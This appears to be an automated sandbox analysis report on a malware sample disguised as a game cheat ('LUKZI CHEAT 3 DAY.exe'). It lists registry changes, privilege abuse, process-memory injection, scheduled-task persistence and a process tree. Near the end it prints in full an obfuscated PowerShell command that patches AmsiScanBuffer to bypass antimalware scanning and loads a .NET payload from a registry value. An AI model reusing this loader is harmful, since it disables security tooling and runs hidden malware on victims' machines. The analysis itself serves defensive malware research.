03336623033306436343630386262623930386563346333626237360000b20009000400efbe515a4f84515a4f842e000000000000000000000000000000000000000000000000008c4ea100610033003900640036003400330061003600640065003300380063006300390036006300300061006300370031006300350030006600350062003000300034006500340030006200300033003600620030003300300064003600340036003000380062006200620039003000380065006300340063003300620062003700360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000be3426831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61333964363433613664653338636339366330616337316335306635623030346534306230333662303330643634363038626262393038656334633362623736000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726b6d646264636f0000000000000000b66abbf5c5c9144cbbc848dae445368f072708d94cedef118cd4f6c132cc6d85b66abbf5c5c9144cbbc848dae445368f072708d94cedef118cd4f6c132cc6d85ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d00320032003500390031003800330036002d0031003100380033003000390030003000350035002d0031003200320030003600350038003100380030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000924b2722000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = 2c0e80801a8edb01	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = "8324"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b09fbe44-77ca-4abd-8	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = "\\\\?\\Volume{22274B92-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a56638e5a7e685fd5e9b70b64c8028113bd98d7d0559ee1ab15bf7497a2f5369"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = "0"	RuntimeBroker.exe
Key deleted	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f91750c5-12eb-4630-a	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000b501bcd05981db014c885f801a8edb014c885f801a8edb01e5990a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000515a4f842000613536363338653561376536383566643565396237306236346338303238313133626439386437643035353965653161623135626637343937613266353336390000b20009000400efbe515a4f84515a4f842e0000000000000000000000000000000000000000000000000019ec9e00610035003600360033003800650035006100370065003600380035006600640035006500390062003700300062003600340063003800300032003800310031003300620064003900380064003700640030003500350039006500650031006100620031003500620066003700340039003700610032006600350033003600390000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000be3426831000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61353636333865356137653638356664356539623730623634633830323831313362643938643764303535396565316162313562663734393761326635333639000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000726b6d646264636f0000000000000000b66abbf5c5c9144cbbc848dae445368f062708d94cedef118cd4f6c132cc6d85b66abbf5c5c9144cbbc848dae445368f062708d94cedef118cd4f6c132cc6d85ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d00320032003500390031003800330036002d0031003100380033003000390030003000350035002d0031003200320030003600350038003100380030002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000924b2722000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = "\\\\?\\Volume{22274B92-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\a39d643a6de38cc96c0ac71c50f5b004e40b036b030d64608bbb908ec4c3bb76"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = "0"	RuntimeBroker.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3856	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4720	powershell.exe
4720	powershell.exe
2244	powershell.exe
2244	powershell.exe
2244	powershell.exe
5036	FMyUS.eXe
5036	FMyUS.eXe
5036	FMyUS.eXe
5036	FMyUS.eXe
4312	VjTDlRoV.exe
4312	VjTDlRoV.exe
4312	VjTDlRoV.exe
4312	VjTDlRoV.exe
3032	powershell.exe
3032	powershell.exe
3032	powershell.exe
1808	powershell.exe
1808	powershell.exe
1808	powershell.exe
436	powershell.exe
436	powershell.exe
436	powershell.exe
1668	powershell.EXE
1668	powershell.EXE
1668	powershell.EXE
1668	powershell.EXE
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
396	dllhost.exe
4316	powershell.exe
4316	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3384	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	1876	LUKZI CHEAT 3 DAY.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	5036	FMyUS.eXe
Token: SeDebugPrivilege	4312	VjTDlRoV.exe
Token: SeDebugPrivilege	3000	svOrbEl0.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	1808	powershell.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	1668	powershell.EXE
Token: SeDebugPrivilege	1668	powershell.EXE
Token: SeDebugPrivilege	396	dllhost.exe
Token: SeShutdownPrivilege	2164	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2164	mousocoreworker.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe
Token: SeIncreaseQuotaPrivilege	2340	svchost.exe
Token: SeSecurityPrivilege	2340	svchost.exe
Token: SeTakeOwnershipPrivilege	2340	svchost.exe
Token: SeLoadDriverPrivilege	2340	svchost.exe
Token: SeSystemtimePrivilege	2340	svchost.exe
Token: SeBackupPrivilege	2340	svchost.exe
Token: SeRestorePrivilege	2340	svchost.exe
Token: SeShutdownPrivilege	2340	svchost.exe
Token: SeSystemEnvironmentPrivilege	2340	svchost.exe
Token: SeUndockPrivilege	2340	svchost.exe
Token: SeManageVolumePrivilege	2340	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe
Token: SeIncreaseQuotaPrivilege	2340	svchost.exe
Token: SeSecurityPrivilege	2340	svchost.exe
Token: SeTakeOwnershipPrivilege	2340	svchost.exe
Token: SeLoadDriverPrivilege	2340	svchost.exe
Token: SeSystemtimePrivilege	2340	svchost.exe
Token: SeBackupPrivilege	2340	svchost.exe
Token: SeRestorePrivilege	2340	svchost.exe
Token: SeShutdownPrivilege	2340	svchost.exe
Token: SeSystemEnvironmentPrivilege	2340	svchost.exe
Token: SeUndockPrivilege	2340	svchost.exe
Token: SeManageVolumePrivilege	2340	svchost.exe
Token: SeAuditPrivilege	2484	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe
Token: SeIncreaseQuotaPrivilege	2340	svchost.exe
Token: SeSecurityPrivilege	2340	svchost.exe
Token: SeTakeOwnershipPrivilege	2340	svchost.exe
Token: SeLoadDriverPrivilege	2340	svchost.exe
Token: SeSystemtimePrivilege	2340	svchost.exe
Token: SeBackupPrivilege	2340	svchost.exe
Token: SeRestorePrivilege	2340	svchost.exe
Token: SeShutdownPrivilege	2340	svchost.exe
Token: SeSystemEnvironmentPrivilege	2340	svchost.exe
Token: SeUndockPrivilege	2340	svchost.exe
Token: SeManageVolumePrivilege	2340	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2340	svchost.exe
Token: SeIncreaseQuotaPrivilege	2340	svchost.exe
Token: SeSecurityPrivilege	2340	svchost.exe
Token: SeTakeOwnershipPrivilege	2340	svchost.exe
Token: SeLoadDriverPrivilege	2340	svchost.exe
Token: SeSystemtimePrivilege	2340	svchost.exe
Token: SeBackupPrivilege	2340	svchost.exe
Token: SeRestorePrivilege	2340	svchost.exe
Token: SeShutdownPrivilege	2340	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1876	LUKZI CHEAT 3 DAY.exe

Suspicious use of UnmapMainImage 5 IoCs

pid	Process
2444	svchost.exe
2444	svchost.exe
3384	Explorer.EXE
4092	RuntimeBroker.exe
1360	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3460 wrote to memory of 1364	3460	LUKZI CHEAT 3 DAY.exe	87
PID 3460 wrote to memory of 1364	3460	LUKZI CHEAT 3 DAY.exe	87
PID 3460 wrote to memory of 796	3460	LUKZI CHEAT 3 DAY.exe	88
PID 3460 wrote to memory of 796	3460	LUKZI CHEAT 3 DAY.exe	88
PID 796 wrote to memory of 4720	796	cmd.exe	90
PID 796 wrote to memory of 4720	796	cmd.exe	90
PID 1364 wrote to memory of 1876	1364	LUKZI CHEAT 3 DAY.exe	92
PID 1364 wrote to memory of 1876	1364	LUKZI CHEAT 3 DAY.exe	92
PID 4720 wrote to memory of 2244	4720	powershell.exe	94
PID 4720 wrote to memory of 2244	4720	powershell.exe	94
PID 4720 wrote to memory of 5036	4720	powershell.exe	96
PID 4720 wrote to memory of 5036	4720	powershell.exe	96
PID 4720 wrote to memory of 5036	4720	powershell.exe	96
PID 5036 wrote to memory of 4312	5036	FMyUS.eXe	97
PID 5036 wrote to memory of 4312	5036	FMyUS.eXe	97
PID 4720 wrote to memory of 3000	4720	powershell.exe	98
PID 4720 wrote to memory of 3000	4720	powershell.exe	98
PID 3000 wrote to memory of 3032	3000	svOrbEl0.exe	102
PID 3000 wrote to memory of 3032	3000	svOrbEl0.exe	102
PID 3000 wrote to memory of 1808	3000	svOrbEl0.exe	104
PID 3000 wrote to memory of 1808	3000	svOrbEl0.exe	104
PID 3000 wrote to memory of 436	3000	svOrbEl0.exe	106
PID 3000 wrote to memory of 436	3000	svOrbEl0.exe	106
PID 3000 wrote to memory of 3856	3000	svOrbEl0.exe	109
PID 3000 wrote to memory of 3856	3000	svOrbEl0.exe	109
PID 4720 wrote to memory of 1824	4720	powershell.exe	111
PID 4720 wrote to memory of 1824	4720	powershell.exe	111
PID 4720 wrote to memory of 1824	4720	powershell.exe	111
PID 1668 wrote to memory of 396	1668	powershell.EXE	116
PID 1668 wrote to memory of 396	1668	powershell.EXE	116
PID 1668 wrote to memory of 396	1668	powershell.EXE	116
PID 1668 wrote to memory of 396	1668	powershell.EXE	116
PID 1668 wrote to memory of 396	1668	powershell.EXE	116
PID 1668 wrote to memory of 396	1668	powershell.EXE	116
PID 1668 wrote to memory of 396	1668	powershell.EXE	116
PID 1668 wrote to memory of 396	1668	powershell.EXE	116
PID 396 wrote to memory of 612	396	dllhost.exe	5
PID 396 wrote to memory of 672	396	dllhost.exe	7
PID 396 wrote to memory of 948	396	dllhost.exe	12
PID 396 wrote to memory of 60	396	dllhost.exe	13
PID 396 wrote to memory of 464	396	dllhost.exe	14
PID 396 wrote to memory of 712	396	dllhost.exe	15
PID 396 wrote to memory of 652	396	dllhost.exe	16
PID 396 wrote to memory of 1108	396	dllhost.exe	18
PID 396 wrote to memory of 1116	396	dllhost.exe	19
PID 396 wrote to memory of 1196	396	dllhost.exe	20
PID 396 wrote to memory of 1248	396	dllhost.exe	21
PID 396 wrote to memory of 1288	396	dllhost.exe	22
PID 396 wrote to memory of 1296	396	dllhost.exe	23
PID 396 wrote to memory of 1392	396	dllhost.exe	24
PID 396 wrote to memory of 1440	396	dllhost.exe	25
PID 396 wrote to memory of 1464	396	dllhost.exe	26
PID 396 wrote to memory of 1552	396	dllhost.exe	27
PID 396 wrote to memory of 1580	396	dllhost.exe	28
PID 396 wrote to memory of 1652	396	dllhost.exe	29
PID 396 wrote to memory of 1708	396	dllhost.exe	30
PID 396 wrote to memory of 1716	396	dllhost.exe	31
PID 396 wrote to memory of 1812	396	dllhost.exe	32
PID 396 wrote to memory of 1912	396	dllhost.exe	33
PID 396 wrote to memory of 1920	396	dllhost.exe	34
PID 396 wrote to memory of 1972	396	dllhost.exe	35
PID 396 wrote to memory of 1992	396	dllhost.exe	36
PID 396 wrote to memory of 1500	396	dllhost.exe	37
PID 396 wrote to memory of 2060	396	dllhost.exe	39

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:60
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{ebf1837c-5f83-496a-90ea-69f4a4dc5e21}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:396

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:712

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:652
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AODHWWCMiRqI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$PSpXHWRKqdzjpL,[Parameter(Position=1)][Type]$tDqgZAgEhO)$wUKWPFmiDoy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+'e'+''+'c'+''+'t'+'e'+[Char](100)+''+'D'+'el'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+'od'+'u'+''+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+'e'+'legat'+'e'+'T'+[Char](121)+'p'+'e'+'',''+[Char](67)+''+'l'+'a'+[Char](115)+'s,'+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'S'+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'oCl'+[Char](97)+''+'s'+'s',[MulticastDelegate]);$wUKWPFmiDoy.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$PSpXHWRKqdzjpL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$wUKWPFmiDoy.DefineMethod('In'+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+''+[Char](86)+'irt'+'u'+''+[Char](97)+'l',$tDqgZAgEhO,$PSpXHWRKqdzjpL).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $wUKWPFmiDoy.CreateType();}$LfiyjKRGjKZDs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType('M'+'i'+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+'n'+'sa'+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$VmUbPmHkHEEQdY=$LfiyjKRGjKZDs.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+'A'+''+[Char](100)+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+'t'+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sNhGrOrLpYQQFuIECcH=AODHWWCMiRqI @([String])([IntPtr]);$DqqSKhJOZGpYQegeUGeHII=AODHWWCMiRqI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ThlaUNJgAFi=$LfiyjKRGjKZDs.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+'3'+'2'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$CqonZCBxpbymUw=$VmUbPmHkHEEQdY.Invoke($Null,@([Object]$ThlaUNJgAFi,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+'ib'+'r'+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$oHSTgMwgBqOOXPCKH=$VmUbPmHkHEEQdY.Invoke($Null,@([Object]$ThlaUNJgAFi,[Object]('Vi'+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+'t')));$VCYYGpY=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CqonZCBxpbymUw,$sNhGrOrLpYQQFuIECcH).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$xVlecdJOcRstiSSqG=$VmUbPmHkHEEQdY.Invoke($Null,@([Object]$VCYYGpY,[Object](''+'A'+''+'m'+''+[Char](115)+''+'i'+'S'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$lJDVinZgJB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oHSTgMwgBqOOXPCKH,$DqqSKhJOZGpYQegeUGeHII).Invoke($xVlecdJOcRstiSSqG,[uint32]8,4,[ref]$lJDVinZgJB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xVlecdJOcRstiSSqG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oHSTgMwgBqOOXPCKH,$DqqSKhJOZGpYQegeUGeHII).Invoke($xVlecdJOcRstiSSqG,[uint32]8,0x20,[ref]$lJDVinZgJB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OFTWA'+'R'+''+[Char](69)+'').GetValue(''+'s'+''+'v'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1668
- C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  C:\Users\Admin\AppData\Roaming\svOrbEl0.exe
  2⤵
  - Executes dropped EXE
  PID:1944
